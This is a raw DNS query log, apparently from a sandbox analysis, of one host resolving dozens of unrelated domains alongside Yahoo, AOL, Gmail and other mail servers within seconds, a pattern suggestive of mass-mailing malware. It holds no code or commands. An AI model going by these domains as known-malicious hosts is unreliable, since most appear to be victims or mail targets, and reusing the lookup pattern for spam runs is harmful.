                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.605817080 CEST8.8.8.8192.168.2.60x9368No error (0)smtp.aol.g03.yahoodns.net87.248.97.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.654855013 CEST8.8.8.8192.168.2.60x2580Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.748471975 CEST8.8.8.8192.168.2.60x3f54Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.749861956 CEST8.8.8.8192.168.2.60xe5dbNo error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.749861956 CEST8.8.8.8192.168.2.60xe5dbNo error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.790630102 CEST8.8.8.8192.168.2.60x148dNo error (0)vivastay.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.790630102 CEST8.8.8.8192.168.2.60x148dNo error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.790630102 CEST8.8.8.8192.168.2.60x148dNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.790630102 CEST8.8.8.8192.168.2.60x148dNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.801521063 CEST8.8.8.8192.168.2.60x44c8Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.845304012 CEST8.8.8.8192.168.2.60xd00bNo error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.845304012 CEST8.8.8.8192.168.2.60xd00bNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.845304012 CEST8.8.8.8192.168.2.60xd00bNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com3.212.23.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.845304012 CEST8.8.8.8192.168.2.60xd00bNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com52.204.111.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.877120018 CEST8.8.8.8192.168.2.60x2201Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:30.054084063 CEST8.8.8.8192.168.2.60x993cNo error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:30.240035057 CEST8.8.8.8192.168.2.60x220eNo error (0)gmail-smtp-in.l.google.com108.177.126.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:30.258071899 CEST8.8.8.8192.168.2.60x4d16No error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.061439037 CEST8.8.8.8192.168.2.60xb3d2No error (0)revoldia.net154.210.36.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.200623989 CEST8.8.8.8192.168.2.60x10dbNo error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.200623989 CEST8.8.8.8192.168.2.60x10dbNo error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.223596096 CEST8.8.8.8192.168.2.60xabf6No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.358778954 CEST8.8.8.8192.168.2.60xc66bNo error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.358778954 CEST8.8.8.8192.168.2.60xc66bNo error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.459135056 CEST8.8.8.8192.168.2.60x65e3Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.482973099 CEST8.8.8.8192.168.2.60x4694No error (0)onzcda.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.482973099 CEST8.8.8.8192.168.2.60x4694No error (0)onzcda.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.529974937 CEST8.8.8.8192.168.2.60xb80eNo error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.598639011 CEST8.8.8.8192.168.2.60x3daaNo error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.684885979 CEST8.8.8.8192.168.2.60xc158No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.095746994 CEST8.8.8.8192.168.2.60x1b3fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.284147024 CEST8.8.8.8192.168.2.60x8ef6No error (0)rkengg.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.284147024 CEST8.8.8.8192.168.2.60x8ef6No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.284147024 CEST8.8.8.8192.168.2.60x8ef6No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.284147024 CEST8.8.8.8192.168.2.60x8ef6No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.341267109 CEST8.8.8.8192.168.2.60x2821No error (0)x96.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.341267109 CEST8.8.8.8192.168.2.60x2821No error (0)x96.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.453286886 CEST8.8.8.8192.168.2.60x195cNo error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.453286886 CEST8.8.8.8192.168.2.60x195cNo error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.967768908 CEST8.8.8.8192.168.2.60x4b9bNo error (0)aiolos-sa.gr188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.967768908 CEST8.8.8.8192.168.2.60x4b9bNo error (0)aiolos-sa.gr188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.981378078 CEST8.8.8.8192.168.2.60x7eb0No error (0)lyto.net188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.981378078 CEST8.8.8.8192.168.2.60x7eb0No error (0)lyto.net188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:33.104228973 CEST8.8.8.8192.168.2.60x1b3fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:33.178869963 CEST8.8.8.8192.168.2.60x135bNo error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:33.422885895 CEST8.8.8.8192.168.2.60x365No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.263818026 CEST8.8.8.8192.168.2.60xaac6No error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.481270075 CEST8.8.8.8192.168.2.60xec13No error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.483140945 CEST8.8.8.8192.168.2.60xfd09No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.495599985 CEST8.8.8.8192.168.2.60x4f32No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.495599985 CEST8.8.8.8192.168.2.60x4f32No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.555988073 CEST8.8.8.8192.168.2.60x1010No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.555988073 CEST8.8.8.8192.168.2.60x1010No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.654020071 CEST8.8.8.8192.168.2.60xebb4Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.739811897 CEST8.8.8.8192.168.2.60x5e4bNo error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.739811897 CEST8.8.8.8192.168.2.60x5e4bNo error (0)smtp.mail.global.gm0.yahoodns.net87.248.97.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.625896931 CEST8.8.8.8192.168.2.60xcf7eNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.637166977 CEST8.8.8.8192.168.2.60x2b2Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.754378080 CEST8.8.8.8192.168.2.60x269cNo error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.858993053 CEST8.8.8.8192.168.2.60x62c3No error (0)zugseil.com92.42.191.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.861617088 CEST8.8.8.8192.168.2.60xb3e7No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.864738941 CEST8.8.8.8192.168.2.60xc33bNo error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.864787102 CEST8.8.8.8192.168.2.60x63dcNo error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.867955923 CEST8.8.8.8192.168.2.60xbb60Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.869710922 CEST8.8.8.8192.168.2.60xef6aNo error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.869710922 CEST8.8.8.8192.168.2.60xef6aNo error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.936469078 CEST8.8.8.8192.168.2.60x97daNo error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.936469078 CEST8.8.8.8192.168.2.60x97daNo error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.945764065 CEST8.8.8.8192.168.2.60x24No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.954763889 CEST8.8.8.8192.168.2.60xfacfName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.974117041 CEST8.8.8.8192.168.2.60x8c20Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.090138912 CEST8.8.8.8192.168.2.60x7329No error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.151340961 CEST8.8.8.8192.168.2.60x1b3fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.232357025 CEST8.8.8.8192.168.2.60x6995Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.258379936 CEST8.8.8.8192.168.2.60x124dName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.340693951 CEST8.8.8.8192.168.2.60x1f6aNo error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.761102915 CEST8.8.8.8192.168.2.60xa47dNo error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.778464079 CEST8.8.8.8192.168.2.60x7455No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.872210979 CEST8.8.8.8192.168.2.60x646eNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.872210979 CEST8.8.8.8192.168.2.60x646eNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.904722929 CEST8.8.8.8192.168.2.60x6c55No error (0)dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.904722929 CEST8.8.8.8192.168.2.60x6c55No error (0)dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.033850908 CEST8.8.8.8192.168.2.60xa951No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.149166107 CEST8.8.8.8192.168.2.60x4b19Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.149560928 CEST8.8.8.8192.168.2.60x1d5fNo error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.271804094 CEST8.8.8.8192.168.2.60xabe2No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.502846956 CEST8.8.8.8192.168.2.60xc9b7No error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.502846956 CEST8.8.8.8192.168.2.60xc9b7No error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.570920944 CEST8.8.8.8192.168.2.60xc76dNo error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.998366117 CEST8.8.8.8192.168.2.60xfdd9Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.176371098 CEST8.8.8.8192.168.2.60x5b73No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.181971073 CEST8.8.8.8192.168.2.60x4b19Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.304142952 CEST8.8.8.8192.168.2.60x200Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.334839106 CEST8.8.8.8192.168.2.60x707cNo error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.396904945 CEST8.8.8.8192.168.2.60x22b1Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.474184990 CEST8.8.8.8192.168.2.60x7a58No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.474184990 CEST8.8.8.8192.168.2.60x7a58No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.507714033 CEST8.8.8.8192.168.2.60x4a92Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.600903988 CEST8.8.8.8192.168.2.60xca3bServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.651386976 CEST8.8.8.8192.168.2.60x404cName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.652126074 CEST8.8.8.8192.168.2.60x6aeeServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.711098909 CEST8.8.8.8192.168.2.60xed8fNo error (0)www.wkhk.net206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.781584024 CEST8.8.8.8192.168.2.60xdd9bServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.203294039 CEST8.8.8.8192.168.2.60xb072No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.203486919 CEST8.8.8.8192.168.2.60xbfc8No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.268398046 CEST8.8.8.8192.168.2.60x4b19Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.349273920 CEST8.8.8.8192.168.2.60x3fcaName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.455774069 CEST8.8.8.8192.168.2.60x892fName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.483300924 CEST8.8.8.8192.168.2.60x9c8No error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.483300924 CEST8.8.8.8192.168.2.60x9c8No error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.483300924 CEST8.8.8.8192.168.2.60x9c8No error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.524851084 CEST8.8.8.8192.168.2.60xbde6No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.812633991 CEST8.8.8.8192.168.2.60xde8eNo error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.137274981 CEST8.8.8.8192.168.2.60x9bfcName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.363579988 CEST8.8.8.8192.168.2.60x7521Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.363611937 CEST8.8.8.8192.168.2.60xf691No error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.443850040 CEST8.8.8.8192.168.2.60xee6aNo error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.443850040 CEST8.8.8.8192.168.2.60xee6aNo error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.523588896 CEST8.8.8.8192.168.2.60x7c00No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.523588896 CEST8.8.8.8192.168.2.60x7c00No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.604852915 CEST8.8.8.8192.168.2.60x9f47Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.633729935 CEST8.8.8.8192.168.2.60xd75eName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.058974981 CEST8.8.8.8192.168.2.60x32aNo error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.058974981 CEST8.8.8.8192.168.2.60x32aNo error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.202400923 CEST8.8.8.8192.168.2.60x2cf6No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.202400923 CEST8.8.8.8192.168.2.60x2cf6No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.204435110 CEST8.8.8.8192.168.2.60xe1e1No error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.208909988 CEST8.8.8.8192.168.2.60x1e8aNo error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.209228039 CEST8.8.8.8192.168.2.60xb994No error (0)cutchie.com199.59.243.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.209383011 CEST8.8.8.8192.168.2.60x13e7No error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.209872007 CEST8.8.8.8192.168.2.60x90b0No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.209924936 CEST8.8.8.8192.168.2.60x84deNo error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.211160898 CEST8.8.8.8192.168.2.60xf430No error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.212022066 CEST8.8.8.8192.168.2.60xe184No error (0)revoldia.net154.210.36.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.217441082 CEST8.8.8.8192.168.2.60x7e52No error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.217788935 CEST8.8.8.8192.168.2.60x5d48No error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.217788935 CEST8.8.8.8192.168.2.60x5d48No error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.217788935 CEST8.8.8.8192.168.2.60x5d48No error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.217788935 CEST8.8.8.8192.168.2.60x5d48No error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.218714952 CEST8.8.8.8192.168.2.60x25b8No error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.219558001 CEST8.8.8.8192.168.2.60x762fName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.223989964 CEST8.8.8.8192.168.2.60x84e7No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.228012085 CEST8.8.8.8192.168.2.60xc8f4No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.242063999 CEST8.8.8.8192.168.2.60x4b66Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.242094994 CEST8.8.8.8192.168.2.60x1e35No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.242094994 CEST8.8.8.8192.168.2.60x1e35No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.245460987 CEST8.8.8.8192.168.2.60x89c6No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.250370026 CEST8.8.8.8192.168.2.60x9775Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.252496004 CEST8.8.8.8192.168.2.60x67ceNo error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.252496004 CEST8.8.8.8192.168.2.60x67ceNo error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.252496004 CEST8.8.8.8192.168.2.60x67ceNo error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.252496004 CEST8.8.8.8192.168.2.60x67ceNo error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.255059004 CEST8.8.8.8192.168.2.60x4f1dNo error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.256458044 CEST8.8.8.8192.168.2.60x3ebaNo error (0)zugseil.com92.42.191.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.290632963 CEST8.8.8.8192.168.2.60x49a9No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.309627056 CEST8.8.8.8192.168.2.60x3928No error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.309906960 CEST8.8.8.8192.168.2.60xa88cNo error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.344048023 CEST8.8.8.8192.168.2.60x4b19Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
